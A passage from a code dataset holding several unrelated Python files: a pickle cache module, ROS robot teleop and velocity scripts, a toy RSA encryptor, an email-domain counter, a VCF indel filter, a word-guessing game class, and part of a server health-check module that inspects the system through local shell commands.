MiscUtils.DataTable, which loads and represents\ncomma-separated files, and the separate MiddleKit plug-in which has an\nobject model file. So for examples on using this module, load up the\nfollowing files and search for \"Pickle\"::\n\n MiscUtils/DataTable.py\n MiddleKit/Core/Model.py\n\nThe cached file is named the same as the original file with\n'.pickle.cache' suffixed. The utility of '.pickle' is to denote the file\nformat and the utility of '.cache' is to provide ``*.cache`` as a simple\npattern that can be removed, ignored by backup scripts, etc.\n\nThe treatment of the cached file is silent and friendly just like\nPython's approach to .pyc files. If it cannot be read or written for\nvarious reasons (cache is out of date, permissions are bad, wrong python\nversion, etc.), then it will be silently ignored.\n\nGRANULARITY\n\nIn constructing the test suite, I discovered that if the source file is\nnewly written less than 1 second after the cached file, then the fact\nthat the source file is newer will not be detected and the cache will\nstill be used. I believe this is a limitation of the granularity of\nos.path.getmtime(). If anyone knows of a more granular solution, please\nlet me know.\n\nThis would only be a problem in programmatic situations where the source\nfile was rapidly being written and read. I think that's fairly rare.\n\nSEE ALSO\n https://docs.python.org/3/library/pickle.html\n\"\"\"\n\nimport os\nimport sys\nfrom time import sleep\nfrom pprint import pprint\ntry:\n from pickle import load, dump, HIGHEST_PROTOCOL as maxPickleProtocol\nexcept ImportError:\n from pickle import load, dump, HIGHEST_PROTOCOL as maxPickleProtocol\n\nverbose = False\n\n# force version_info into a simple tuple\nversionInfo = tuple(sys.version_info)\n\n\nclass PickleCache:\n \"\"\"Abstract base class for PickleCacheReader and PickleCacheWriter.\"\"\"\n\n _verbose = verbose\n\n def picklePath(self, filename):\n return filename + '.pickle.cache'\n\n\nclass PickleCacheReader(PickleCache):\n\n def read(self, filename,\n pickleProtocol=None, source=None, verbose=None):\n \"\"\"Read data from pickle cache.\n\n Returns the data from the pickle cache version of the filename,\n if it can read. Otherwise returns None, which also indicates\n that writePickleCache() should be subsequently called after\n the original file is read.\n \"\"\"\n if pickleProtocol is None or pickleProtocol < 0:\n pickleProtocol = maxPickleProtocol\n if verbose is None:\n v = self._verbose\n else:\n v = verbose\n if v:\n print('>> PickleCacheReader.read() - verbose is on')\n if not filename:\n raise ValueError('Missing filename')\n\n if not os.path.exists(filename):\n if v:\n print(f'Cannot find {filename!r}.')\n open(filename) # to get a properly constructed IOError\n\n shouldDeletePickle = False\n data = None\n\n picklePath = self.picklePath(filename)\n if os.path.exists(picklePath):\n if os.path.getmtime(picklePath) < os.path.getmtime(filename):\n if v:\n print('Cache is out of date.')\n shouldDeletePickle = True\n else:\n try:\n if v:\n print(f'About to open for read {picklePath!r}.')\n file = open(picklePath, 'rb')\n except IOError as e:\n if v:\n print('Cannot open cache file:'\n f' {e.__class__.__name__}: {e}.')\n else:\n try:\n if v:\n print('about to load')\n d = load(file)\n except EOFError:\n if v:\n print('EOFError - not loading')\n shouldDeletePickle = True\n except Exception as exc:\n print(f'WARNING: {self.__class__.__name__}:'\n f' {exc.__class__.__name__}: {exc}')\n shouldDeletePickle = True\n else:\n file.close()\n if v:\n print('Finished reading.')\n if not isinstance(d, dict):\n raise TypeError(f'Expected dict, but got: {d!r}')\n for key in ('source', 'data',\n 'pickle protocol', 'python version'):\n if key not in d:\n raise ValueError(f'{key} not found')\n if source and d['source'] != source:\n if v:\n print(f'Not from required source ({source}):'\n f\" {d['source']}.\")\n shouldDeletePickle = True\n elif d['pickle protocol'] != pickleProtocol:\n if v:\n print('Pickle protocol'\n f\" ({d['pickle protocol']})\"\n ' does not match expected'\n f' ({pickleProtocol}).')\n shouldDeletePickle = True\n elif d['python version'] != versionInfo:\n if v:\n print('Python version'\n \" {d['python version']}\"\n ' does not match current'\n ' {versionInfo}')\n shouldDeletePickle = True\n else:\n if v:\n print('All tests pass, accepting data.')\n if v > 1:\n print('Display full dict:')\n pprint(d)\n data = d['data']\n\n # Delete the pickle file if suggested by previous conditions\n if shouldDeletePickle:\n try:\n if v:\n print('Attempting to remove pickle cache file.')\n os.remove(picklePath)\n except OSError as exc:\n if v:\n print(f'Failed to remove: {exc.__class__.__name__}: {exc}')\n\n if v:\n print('Done reading data.')\n print()\n\n return data\n\n\nclass PickleCacheWriter(PickleCache):\n\n _writeSleepInterval = 0.1\n\n def write(self, data, filename,\n pickleProtocol=None, source=None, verbose=None):\n if pickleProtocol is None or pickleProtocol < 0:\n pickleProtocol = maxPickleProtocol\n if verbose is None:\n v = self._verbose\n else:\n v = verbose\n if v:\n print('>> PickleCacheWriter.write() - verbose is on.')\n if not filename:\n raise ValueError('Missing filename')\n sourceTimestamp = os.path.getmtime(filename)\n\n picklePath = self.picklePath(filename)\n d = {\n 'source': source,\n 'python version': versionInfo,\n 'pickle protocol': pickleProtocol,\n 'data': data,\n }\n if v > 1:\n print('Display full dict:')\n pprint(d)\n try:\n if v:\n print('About to open for write %r.' % picklePath)\n pickleFile = open(picklePath, 'wb')\n except IOError as e:\n if v:\n print(f'error. not writing. {e.__class__.__name__}: {e}')\n else:\n while True:\n dump(d, pickleFile, pickleProtocol)\n pickleFile.close()\n # Make sure the cache has a newer timestamp, otherwise the\n # cache will just get ignored and rewritten next time.\n if os.path.getmtime(picklePath) == sourceTimestamp:\n if v:\n print('Timestamps are identical, sleeping'\n f' {self._writeSleepInterval:%0.2f} seconds.')\n sleep(self._writeSleepInterval)\n pickleFile = open(picklePath, 'wb')\n else:\n break\n\n if v:\n print('Done writing data.')\n print()\n\n\n# Define module level convenience functions:\n_reader = PickleCacheReader()\nreadPickleCache = _reader.read\n_writer = PickleCacheWriter()\nwritePickleCache = _writer.write\n","sub_path":"webware/MiscUtils/PickleCache.py","file_name":"PickleCache.py","file_ext":"py","file_size_in_byte":9155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"462879799","text":"#! /usr/bin/env python\n'''\nAuthor: David Pierce Walker-Howell\nDate Created: 06/03/2020\nDescription: Provide an interface for controlling the smile mobile robot with keyboard\n teleop.\n'''\nimport rospy\nfrom std_msgs.msg import Int16MultiArray\nfrom pynput import keyboard\nimport sys\nimport numpy as np\n\nclass Keyboard_Teleop:\n '''\n Interface command to the robot for controlling the PWM of each motor \n with keyboard commands.\n '''\n def __init__(self, node_name=\"keyboard_teleop\"):\n '''\n Initialize the keyboard teleop control.\n\n Parameters:\n node_name: The name of the keyboard teleop node. Default: keyboard_teleop\n\n Returns:\n N/A\n '''\n self.node_name = node_name\n rospy.init_node(node_name)\n\n #TOPICS - This formate of name space is given for ability to simulate multiple robots\n #by providing different names.\n\n pwm_topic = rospy.get_namespace() + \"pwm\"\n\n #Initialize the publisher to the pwm topic\n\n self.pwm_pub = rospy.Publisher(pwm_topic, Int16MultiArray, queue_size=1)\n self.pwm_msg = Int16MultiArray()\n \n self.pub_timer = rospy.Rate(10)\n \n #Initialize the keyboard listener\n self.listener = keyboard.Listener(\n on_press=self.on_press,\n on_release=self.on_release)\n\n self.linear_pwm = 0\n self.angular_pwm = 0\n self.linear_go = 0\n self.angular_go = 0\n\n #Preset values (min = 0, max = 255)!\n self.set_linear_pwm_perc = 0.1\n self.set_angular_pwm_perc = 0.4\n self.set_linear_pwm = int(self.set_linear_pwm_perc * 255)\n self.set_angular_pwm = int(self.set_angular_pwm_perc * 255)\n\n\n def on_press(self, key):\n '''\n Callback function for the keyboard listener to identify which key was\n pressed.\n\n Parameters:\n key:\n Returns:\n N/A\n '''\n sys.stdout.write(\"\\r \")\n sys.stdout.flush()\n\n\n #Ensure w and s aren't read at the same time\n if(key.char == 'w'): #Forward movement\n self.linear_go = 1\n elif(key.char == 's'):\n self.linear_go = -1\n\n if(key.char == 'a'):#Left turns\n self.angular_go = 1\n\n elif(key.char == 'd'): #Right turns\n self.angular_go = -1\n \n if(key.char == 'i'): #Increase the throttle\n if(self.set_linear_pwm_perc < 0.9):\n self.set_linear_pwm_perc += 0.1\n self.set_linear_pwm = int(self.set_linear_pwm_perc * 255)\n\n elif(key.char == 'j'): #Decrease the throttle\n if(self.set_linear_pwm_perc > 0.1):\n self.set_linear_pwm_perc -= 0.1\n self.set_linear_pwm = int(self.set_linear_pwm_perc * 255)\n \n \n def on_release(self, key):\n '''\n Callback function for the keyboard listener to identify which key was\n released.\n\n Parameters:\n key:\n Returns:\n N/A\n '''\n if(key.char == 'w' or key.char == 's'):\n self.linear_go = 0\n\n elif(key.char == 'a' or key.char == 'd'):\n self.angular_go = 0\n \n \n def run(self):\n '''\n Main loop to read the keyboard inputs and publish them as pwm values.\n\n Parameters:\n N/A\n Returns:\n N/A\n '''\n self.listener.start()\n angular_mean_filter = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n linear_mean_filter = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n\n try:\n while not rospy.is_shutdown():\n \n #mix the linear and angular pwm's to get the pwm of each motor\n if(self.linear_go == -1):\n self.linear_pwm = -1 * self.set_linear_pwm\n elif(self.linear_go == 1):\n self.linear_pwm = self.set_linear_pwm\n else:\n self.linear_pwm = 0\n \n if(self.angular_go == -1):\n self.angular_pwm = -1 * self.set_angular_pwm\n elif(self.angular_go == 1):\n self.angular_pwm = self.set_angular_pwm\n else:\n self.angular_pwm = 0\n \n #Run the mean average filter to ensure values don't change too fast\n angular_mean_filter = np.delete(angular_mean_filter, 0); \n angular_mean_filter = np.append(angular_mean_filter, self.angular_pwm)\n linear_mean_filter = np.delete(linear_mean_filter, 0); \n linear_mean_filter = np.append(linear_mean_filter, self.linear_pwm)\n angular_pwm_filt = np.mean(angular_mean_filter)\n linear_pwm_filt = np.mean(linear_mean_filter)\n\n pwm_1 = linear_pwm_filt - angular_pwm_filt\n pwm_2 = linear_pwm_filt + angular_pwm_filt\n pwm_3 = linear_pwm_filt + angular_pwm_filt\n pwm_4 = linear_pwm_filt - angular_pwm_filt\n\n pwms = [pwm_1, pwm_2, pwm_3, pwm_4]\n \n #Bound the pwms if necessary\n for i in range(4):\n if(pwms[i] < -255):\n pwms[i] = -255\n elif(pwms[i] > 255):\n pwms[i] = 255\n \n #Publish the pwm to the pwm topic\n self.pwm_msg.data = pwms\n self.pwm_pub.publish(self.pwm_msg)\n \n self.pub_timer.sleep()\n\n except rospy.ROSInterruptException:\n pass\n\nif __name__ == \"__main__\":\n\n\n keyboard_teleop = Keyboard_Teleop()\n keyboard_teleop.run()\n\n\n","sub_path":"smile_mobile_robot_ws/src/smile_mobile_robot/src/control/keyboard_teleop.py","file_name":"keyboard_teleop.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"461600398","text":"\"\"\"This is a program to encrypt a string with RSA with a predetrimed key\nCreated by Fred Nordell, Philip Wester and Vilhelm Dinevik. Januray 2015 to March 2015\"\"\"\n\n\nimport math\nimport functions\nimport Keys\nimport change\nimport IO\nimport json\n\n\t\nif (__name__==\"__main__\"):\n\tstart = 1 \t\t\t\t\t\t\t\t\t\t\t\t#checks so it's the start of the program and makes getinput() requre a string\n\tuE = IO.getInput(start) \t\t\t\t\t\t\t\t#define the string as uE (unEncrypted)\n\tprint (\"Unecrypted: \", change.xChange(uE) , \"\\n\" )\t\t#this calls the function to make the string into a list of numbers that corresponds to a letter\n\tplace = 0\n\tencrypted = []\n\tkey = 1\n\tfor q in change.xChange(uE):\t\t\t\t\t\t\t\n\t\tencrypted.append(functions.encrypt(Keys.chooseKey(key,4)[1] , Keys.chooseKey(key,4)[0] , change.xChange(uE)[place]))\n\t\tplace = place + 1\n\t\t\t\n\tprint (\"\\n\")\n\tprint (\"Encrypted: \", encrypted, \"\\n\" )\n\tprint (\"\\n\")\n\t\n\tf = open('encoded_single.txt', 'w')\n\tQ = str(encrypted)\n\tf.write(Q)\n\t\n\tprint (\"Saved to encoded_single.txt in directory\")\n\tprint (\"\\n\")\n","sub_path":"RSA_Encryption_Single_key.py","file_name":"RSA_Encryption_Single_key.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"176273140","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport rospy\nimport smach\nimport smach_ros\nimport random\n\nfrom geometry_msgs.msg import Twist\n\n\nclass YBot():\n def __init__(self, bot_name=\"NoName\",x = 0,th = 0):\n # bot name \n self.name = bot_name\n # velocity argument\n self.vel_x = x \n self.vel_th = th \n # velocity publisher\n self.vel_pub = rospy.Publisher('cmd_vel', Twist,queue_size=1)\n\n\n def strategy(self):\n r = rospy.Rate(1) # change speed 1fps\n twist = Twist()\n twist.linear.x = self.vel_x; twist.linear.y = 0; twist.linear.z = 0\n twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = self.vel_th\n\n target_speed = 0\n target_turn = 0\n control_speed = 0\n control_turn = 0\n\n if not rospy.is_shutdown():\n print(twist)\n self.vel_pub.publish(twist)\n\n r.sleep()\n\n\ndef main():\n rospy.init_node('Y_run')\n bot = YBot('Y_test')\n bot.strategy()\n\n\nif __name__ == '__main__':\n main()","sub_path":"enemy_bot/enemy_bot_level8/burger_war/scripts/YTest.py","file_name":"YTest.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"377750158","text":"# -*- coding: utf-8 -*-\n\n\"\"\"«E-mail domains» + тесты\nСоздать утилиту командной строки, которая обрабатывает данные способом,\nописанным ниже, и возвращает результат в STDOUT.\nВХОДНЫЕ ДАННЫЕ:\nВ командной строке указывается имя текстового файла.\nТекстовый файл с email-адресами (разделитель — перевод строки). Пример:\ninfo@mail.ru\nsupport@vk.com\nddd@rambler.ru\nroxette@mail.ru\nsdfsdf@@@@@rdfdf\nexample@localhost\nиван@иванов.рф\nivan@xn--c1ad6a.xn--p1ai\n\nСУТЬ ОБРАБОТКИ:\nГруппировка адресов по имени домена, подсчёт email-адресов для каждого домена.\n\nВЫХОДНЫЕ ДАННЫЕ:\nИмена доменов и количество адресов в каждом домене.\nСортировка по количеству адресов в домене, по убыванию.\nОтдельной строкой — количество невалидных адресов. Пример:\nmail.ru 2\nvk.com 1\nrambler.ru 1\nINVALID 1\n\nСозданная программа, должна быть максимально покрыта автоматическими тестами\n(юнит тесты и т. п.), валидирующими все аспекты функционирования программы и\nпокрывающими максимальное количество кода программы.\nНесмотря на игрушечный пример оценивается качество кода, его форматирование\n(пробелы, отступы, пустые строки, выделение смысловых блоков и т.п.),\nмодульность, соответствие «лучшим практикам» Python-программирования и,\nглавное, способности писать автотесты.\nПрисылаемый код должен проходить проверку flake8\n\"\"\"\n\nfrom sys import argv\nfrom os.path import isfile\nfrom string import ascii_lowercase, digits\n\n\ndef check_email(email):\n try:\n login, domain = email.lower().split('@')\n except ValueError:\n \"\"\"Не разрешаем использовать несколько @ в email\"\"\"\n return False\n\n if login.startswith('.') or login.endswith('.'):\n \"\"\"Логин не должен начинаться или заканчиваться точкой\"\"\"\n return False\n\n if '..' in login:\n \"\"\"Две и более точек подряд недопустимы\"\"\"\n return False\n\n for i in login:\n if i not in ascii_lowercase + digits + '.+_-':\n \"\"\"Допустимые символы логина\"\"\"\n return False\n\n if '.' not in domain or '---' in domain:\n \"\"\"Домен должен разделяться точкой, более двух тире быть не должно\"\"\"\n return False\n\n for i in domain:\n if i not in ascii_lowercase + digits + '.-':\n \"\"\"локальные адреса откидываем как ошибочные\"\"\"\n return False\n\n if len([i for i in domain if i not in digits + '.-']) < 3:\n \"\"\"Длина должна быть более 3 (хотя бы a.ru)\"\"\"\n return False\n\n return True\n\n\ndef main(f_name):\n\n res = dict()\n res['INVALID'] = set()\n\n with open(f_name) as f:\n for line in f.readlines():\n if not check_email(line[:-1]):\n res['INVALID'].add(line[:-1])\n continue\n\n login, domain = line[:-1].split('@')\n if domain not in res:\n res[domain] = set()\n res[domain].add(login)\n\n return res\n\n\nif __name__ == \"__main__\":\n\n if len(argv) == 1 or not isfile(argv[1]):\n print('usage: {} '.format(argv[0]))\n exit(2)\n\n result = main(argv[1])\n _invalid = result.pop('INVALID')\n\n for i in sorted(result, key=lambda x: len(result[x]), reverse=True):\n print(i, len(result[i]))\n\n print('INVALID', len(_invalid))\n","sub_path":"emaildomains.py","file_name":"emaildomains.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"481805003","text":"#计算vcf中indel的插入缺失长度,挑选插入缺失长度大于等于5的位点进行引物设计\n\n\n#!/PERSONALBIO/Work/Genome/G04/software/miniconda3/bin/python\n# -*- encoding: utf-8 -*-\n\nInsertion = open('Insertion.xls','w')\nDeletion= open('Deletion.xls','w')\nwith open('indels.vcf','r') as f1:\n for line in f1:\n a = []\n b = []\n line = line.strip()\n lst = line.split('\\t')\n a = lst[3].split(',')\n b = lst[4].split(',')\n #alen = len(max(a, key=len, default=''))\n #blen = len(max(b, key=len, default=''))\n alen = [len(i) for i in a]\n blen = [len(i) for i in b]\n if max(blen) - min(alen) >= 5:\n MAX = max(blen) - min(alen)\n Insertion.write(lst[0]+'\\t'+lst[1]+'\\t'+lst[3]+'\\t'+lst[4]+'\\t'+str(MAX)+'\\n')\n if max(alen) - min(blen) >= 5:\n MIN = max(alen) - min(blen)\n Deletion.write(lst[0]+'\\t'+lst[1]+'\\t'+lst[3]+'\\t'+lst[4]+'\\t'+str(MIN)+'\\n')\n","sub_path":"indel_length.py","file_name":"indel_length.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"542125390","text":"from phrasehunter.character import Character\n\n\nclass Phrase:\n \"\"\"\n Controls creation and formatting of one phrase for the game\n \"\"\"\n # Class global constant - an approx maximum number of phrase characters\n # to print on one line\n PRINT_LEN = 60\n\n def __init__(self, phrase):\n '''\n :param phrase:\n :type phrase:\n Attributes:\n phrasestr (str): the phrase, in string format\n phrase (list of Character): the phrase as a list of Characters\n author (str): the author of the quote\n '''\n self.phrasestr = self.format_phrase(phrase[0])\n self.phrase = [Character(char) for char in self.phrasestr]\n self.author = phrase[1]\n\n\n def format_phrase(self, phrase):\n '''\n Some of the phrases (quotes) are longer that what will display normally on one line.\n this function is an initial formatting of phrases which are longer than a\n defined value (class global constant) to insert some newline (\\n) characters\n so they will display on multiple lines - hence more readable.\n Takes a pretty simplistic approach - loops through the characters in the phrase\n keeping count. For each space character after the count hits the defined limit,\n replace with a newline \\n\n :param: phrase = string version of phrase\n :return: modified string with newlines inserted\n :rtype: str\n '''\n count = 0\n phrasel = list(phrase)\n for index, char in enumerate(phrasel):\n if char == ' ' and count > self.PRINT_LEN:\n phrasel[index] = '\\n'\n count = 0\n count += 1\n return ''.join(phrasel)\n\n def display_phrase(self):\n '''\n Display phrase during game. Guessed characters are revealed but characters not\n guessed yet display as an underscore _\n :return: None\n :rtype: None\n '''\n print('\\n')\n for char in self.phrase:\n print_char = char.display_char()\n print(print_char, end=' ')\n print('\\n')\n\n def show_full_quoted_phrase(self):\n \"\"\"\n Displays full (no characters hidden) quote, with author at end of game.\n :return: A string consisting of string representation of quote + the author.\n Newline between end of quote and author.\n :rtype: str\n \"\"\"\n return '\"' + self.phrasestr + '\"\\n - ' + self.author\n\n def check_guess(self, guess):\n \"\"\"\n Check player's guess. Compare guessed character to the characters in the\n phrase, pass to Character class to update phrase character guessed value.\n :param guess: guessed character\n :type guess: str\n :return: good_guess: True or False - Was character in phrase or not\n :rtype: bool\n \"\"\"\n good_guess = False\n for char in self.phrase:\n if not char.guessed:\n char.set_guessed(guess)\n if char.guessed:\n good_guess = True\n return good_guess\n\n def check_if_won(self):\n \"\"\"\n Check if player has won the game !\n If all characters in the phrase are guessed, then it is a yes.\n :return: True or False, won game or not\n :rtype: bool\n \"\"\"\n for char in self.phrase:\n if not char.guessed:\n return False\n return True\n","sub_path":"phrasehunter/phrase.py","file_name":"phrase.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"284957296","text":"# Embedded file name: /hp/support/health/bin/modules/computeNode.py\r\nimport logging\r\nimport os\r\nimport subprocess\r\nimport re\r\nimport shutil\r\nfrom fusionIOUtils import checkFusionIOFirmwareUpgradeSupport\r\nfrom computeNodeInventory import ComputeNodeInventory, Gen1ScaleUpComputeNodeInventory\r\n\r\nclass ComputeNode:\r\n\r\n def __init__(self, healthResourceDict, ip):\r\n self.healthResourceDict = healthResourceDict\r\n self.computeNodeDict = {}\r\n try:\r\n self.healthBasePath = self.healthResourceDict['healthBasePath']\r\n logLevel = self.healthResourceDict['logLevel']\r\n logBaseDir = self.healthResourceDict['logBaseDir']\r\n self.versionInformationLog = self.healthResourceDict['versionInformationLog']\r\n except KeyError as err:\r\n raise KeyError(str(err))\r\n\r\n self.computeNodeDict['ip'] = ip\r\n hostname = os.uname()[1]\r\n self.computeNodeDict['hostname'] = hostname\r\n computeNodeLog = logBaseDir + 'computeNode_' + hostname + '.log'\r\n handler = logging.FileHandler(computeNodeLog)\r\n self.loggerName = ip + 'Logger'\r\n self.computeNodeDict['loggerName'] = self.loggerName\r\n logger = logging.getLogger(self.loggerName)\r\n if logLevel == 'debug':\r\n logger.setLevel(logging.DEBUG)\r\n else:\r\n logger.setLevel(logging.INFO)\r\n formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s', datefmt='%m/%d/%Y %H:%M:%S')\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n\r\n def computeNodeInitialize(self, computeNodeResources, versionInformationLogOnly, updateOSHarddrives):\r\n logger = logging.getLogger(self.loggerName)\r\n resultDict = {'updateNeeded': False,\r\n 'errorMessages': []}\r\n command = 'dmidecode -s system-product-name'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n out = out.strip()\r\n logger.debug('The output of the command (' + command + \") used to get the system's model was: \" + out)\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's model information.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's model information.\")\r\n return resultDict\r\n else:\r\n try:\r\n systemModel = re.match('[a-z,0-9]+\\\\s+(.*)', out, re.IGNORECASE).group(1).replace(' ', '')\r\n except AttributeError as err:\r\n logger.error(\"There was a system model match error when trying to match against '\" + out + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a system model match error.')\r\n return resultDict\r\n\r\n try:\r\n if systemModel not in self.healthResourceDict['supportedComputeNodeModels']:\r\n logger.error(\"The system's model (\" + systemModel + ') is not supported by this CSUR bundle.')\r\n resultDict['errorMessages'].append(\"The system's model is not supported by this CSUR bundle.\")\r\n return resultDict\r\n except KeyError as err:\r\n logger.error('The resource key (' + str(err) + \") was not present in the application's esource file.\")\r\n resultDict['errorMessages'].append('A resource key error was encountered.')\r\n return resultDict\r\n\r\n logger.debug(\"The system's model was determined to be: \" + systemModel + '.')\r\n self.computeNodeDict['systemModel'] = systemModel\r\n if systemModel == 'DL580Gen9':\r\n command = 'dmidecode -s processor-version'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n out = out.strip()\r\n logger.debug('The output of the command (' + command + ') used to get the processor version was: ' + out)\r\n if result.returncode != 0:\r\n logger.error('Unable to get the processor version.\\n' + err)\r\n resultDict['errorMessages'].append('Unable to get the processor version information.')\r\n return resultDict\r\n try:\r\n processorVersion = re.search('CPU (E\\\\d-\\\\s*\\\\d{4}\\\\w* v\\\\d)', out).group(1).replace(' ', '')\r\n except AttributeError as err:\r\n logger.error(\"There was a processor match error when trying to match against '\" + out + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a processor match error.')\r\n return resultDict\r\n\r\n logger.debug(\"The processor's version was determined to be: \" + processorVersion + '.')\r\n else:\r\n processorVersion = ''\r\n self.computeNodeDict['processorVersion'] = processorVersion\r\n command = 'cat /proc/version'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to get the OS distribution information was: ' + out.strip())\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's OS distribution version information.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's OS distribution version information.\")\r\n return resultDict\r\n versionInfo = out.lower()\r\n if 'suse' in versionInfo:\r\n OSDist = 'SLES'\r\n command = 'cat /etc/SuSE-release'\r\n else:\r\n OSDist = 'RHEL'\r\n command = 'cat /etc/redhat-release'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's OS distribution level.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's OS distribution level.\")\r\n return resultDict\r\n releaseInfo = out.replace('\\n', ' ')\r\n if OSDist == 'SLES':\r\n try:\r\n slesVersion = re.match('.*version\\\\s*=\\\\s*([1-4]{2})', releaseInfo, re.IGNORECASE).group(1)\r\n except AttributeError as err:\r\n logger.error(\"There was SLES OS version match error when trying to match against '\" + releaseInfo + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a SLES OS version match error.')\r\n return resultDict\r\n\r\n try:\r\n slesPatchLevel = re.match('.*patchlevel\\\\s*=\\\\s*([1-4]{1})', releaseInfo, re.IGNORECASE).group(1)\r\n except AttributeError as err:\r\n logger.error(\"There was SLES patch level match error when trying to match against '\" + releaseInfo + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a SLES patch level match error.')\r\n return resultDict\r\n\r\n osDistLevel = OSDist + slesVersion + '.' + slesPatchLevel\r\n else:\r\n try:\r\n rhelVersion = re.match('.*release\\\\s+([6-7]{1}.[0-9]{1}).*', releaseInfo, re.IGNORECASE).group(1)\r\n except AttributeError as err:\r\n logger.error(\"There was RHEL OS version match error when trying to match against '\" + releaseInfo + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a RHEL OS version match error.')\r\n return resultDict\r\n\r\n osDistLevel = OSDist + rhelVersion\r\n try:\r\n if osDistLevel not in self.healthResourceDict['supportedDistributionLevels']:\r\n if osDistLevel not in self.healthResourceDict['unsupportedUpgradableDistLevels']:\r\n logger.error(\"The system's OS distribution level (\" + osDistLevel + ') is not supported by this CSUR bundle.')\r\n resultDict['errorMessages'].append(\"The system's OS distribution level is not supported by this CSUR bundle.\")\r\n return resultDict\r\n except KeyError as err:\r\n logger.error('The resource key (' + str(err) + ') was not present in the resource file.')\r\n resultDict['errorMessages'].append('A resource key error was encountered.')\r\n return resultDict\r\n\r\n logger.debug(\"The system's OS distribution level was determined to be: \" + osDistLevel + '.')\r\n self.computeNodeDict['osDistLevel'] = osDistLevel\r\n if not versionInformationLogOnly:\r\n if 'DL380' in systemModel:\r\n command = '/opt/cmcluster/bin/cmviewcl -f line'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if the cluster is running was: ' + out.strip())\r\n if result.returncode != 0:\r\n logger.warn('Unable to check if the cluster is running.\\n' + err)\r\n resultDict['errorMessages'].append('Unable to check if the cluster is running.')\r\n clusterView = out.splitlines()\r\n for line in clusterView:\r\n if re.search('^status=', line):\r\n if re.match('status=up', line):\r\n logger.warn('It appears that the cluster is still running.\\n' + out)\r\n resultDict['errorMessages'].append('It appears that the cluster is still running.')\r\n\r\n if not 'DL380' in systemModel:\r\n if not 'DL320' in systemModel:\r\n command = 'ps -C hdbnameserver,hdbcompileserver,hdbindexserver,hdbpreprocessor,hdbxsengine,hdbwebdispatcher'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if SAP is running was: ' + out.strip())\r\n if result.returncode == 0:\r\n logger.warn('It appears that SAP HANA is still running.\\n' + out)\r\n resultDict['errorMessages'].append('It appears that SAP HANA is still running.')\r\n if systemModel == 'DL580G7' or systemModel == 'DL980G7':\r\n command = 'mount'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if the log partition is mounted was: ' + out.strip())\r\n if result.returncode != 0:\r\n logger.error('Unable to check if the log partition is mounted.\\n' + err)\r\n resultDict['errorMessages'].append('Unable to check if the log partition is mounted.')\r\n return resultDict\r\n if re.search('/hana/log|/HANA/IMDB-log', out, re.MULTILINE | re.DOTALL) != None:\r\n logger.error('The log partition is still mounted.')\r\n resultDict['errorMessages'].append('The log partition needs to be unmounted before the system is updated.')\r\n return resultDict\r\n command = 'uname -r'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n kernel = out.strip()\r\n logger.debug('The output of the command (' + command + ') used to get the currently used kernel was: ' + kernel)\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's current kernel information.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's current kernel information.\")\r\n return resultDict\r\n logger.debug('The currently used kernel was determined to be: ' + kernel + '.')\r\n self.computeNodeDict['kernel'] = kernel\r\n command = 'uname -p'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n processorType = out.strip()\r\n logger.debug('The output of the command (' + command + \") used to get the compute node's processor type was: \" + processorType)\r\n if result.returncode 